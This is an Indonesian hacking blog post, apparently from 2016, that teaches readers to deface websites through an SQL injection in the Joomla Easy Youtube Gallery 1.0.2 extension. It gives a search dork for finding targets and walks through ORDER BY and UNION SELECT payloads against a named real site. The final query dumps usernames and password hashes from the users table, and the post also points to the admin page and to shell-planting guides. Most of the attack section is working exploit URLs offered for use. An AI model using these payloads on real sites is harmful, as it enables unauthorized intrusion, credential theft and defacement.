Home CMS Joomla Deface Dunia Komputer Hacking Security Tester Tutorial Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Wednesday 11 May 2016

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
yoii kali ini kita maen suntik2an di CMS Joomblo.
Oke langsung Aja gay gak usah banyak coli cocote

Dork :
inurl:com_easy_youtube_gallery mycategory
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

 1. Kita Search Dork nya menggunakan search engine


2. Oke kita Pilih Target Yang mau kita injek, disini letak injeknya ada di mycategory= ,
kita coba input string ,jika seperti ini tandanya VULN 

3. Sekarang kita coba cari errornya dimana. 
Kita coba injek satu satu:
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+1--+&defaultvideo=3&Itemid=120 // masih normal

 http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+2--+&defaultvideo=3&Itemid=120  // masih normal lagee

 http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+3--+&defaultvideo=3&Itemid=120 // masih normal mpe lemez mz

 http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+15--+&defaultvideo=3&Itemid=120 // error gan :v *jozz ahhh~

Kolomnya cuman sampe 14 gannn
4. Oke lanjut ke step berikutnya, kita cari angka ajaibnya :D

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=-0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=120

Nah, angka ajaibnya Keliatan Gay :v
5. Oke biar gampang, saya pake DIOS nya mas madblood /-\ 

Nah keliatankan Isi daleman web nya ?:v
6. Sekarang kita liat lebih dalem lagi gimana? :v 


Tuh DALEMANNYA keliatan gann :v
Terus abis itu diapain , kalo dh keliatan dalemannya ? , buka tusuk -> crotz di dalem..

 Ini querynya :
http://centreexcursionistabocairent.com/index.php
?option=com_easy_youtube_gallery
&view=videos
&mycategory=-0+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+ceb_users--+
&defaultvideo=3
&Itemid=120

Karna ini cms Joomla letak page adminnya ada di target.coli/administrator/
Baca juga, tutorial cara menanam Shell di CMS Joomla: Cara Deface Com_User Auto Exploiter dan Cara menanam shell di CMS Joomla

 Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs

 Selamat berinjek dan berhash2 ria akwkawk
Oke Sekian tutorial dari saya, Semoga bermanfaat bagi kalean.

 source and thanks to: 0day


Call Me Sayang A.K.A 3xBitch


tidak perlu muncul ke permukaan , yang penting tetap bergerilya












Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability MasterBlog TCA 5.0 stars based on 35 reviews Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerab...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post

2 comments

avatar
Balas
Unknown delete 18 May 2016 at 01:30

hmm angka ajaib udah keliatan, tapi pas mau ke step brikutnya eror seperti gambar eror pertama, kenapa tuh? hehe

avatar
Balas
Ketikan Nue delete 19 May 2016 at 10:14

bila ada pertanyaan langsung dikirim ke wall fanspage kami saja kak :)
agar dapat dijawab oleh penulis thread ini :)
terimakasih telah membaca postingan ini, salam sukses br0 :D


EmoticonEmoticon

Subscribe to: Post Comments (Atom)